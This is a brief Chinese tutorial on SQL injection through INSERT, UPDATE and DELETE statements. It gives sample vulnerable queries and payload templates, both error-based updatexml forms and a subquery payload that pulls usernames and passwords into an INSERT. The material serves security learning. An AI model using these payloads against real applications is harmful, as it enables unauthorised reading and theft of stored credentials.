目录
前言
本文章主要总结不同于普通查询sql注入,而是稍微少见的insert、update、delete注入。
一、常见形式
(1)insert: insert into users(id,username,passowrd) values (2,'注入点','Olivia');
payload可以为: 'or updatexml() or '
(2)update: update users set id=1,username='注入点',password=3
payload为: 'or updatexml()--+
(3)delete: delete from users where id=2 注入点
payload为: or updatexml() or ''
注意:这些都可以查表、列,但是update因为正在更新数据,所以不能执行查值操作,除非有另外一张同样包含id、username、password字段的表,这样就可以正常进行update查询字段值。
二、insert注入(不使用报错)
payload: ',(select username from test)),((select password from test),''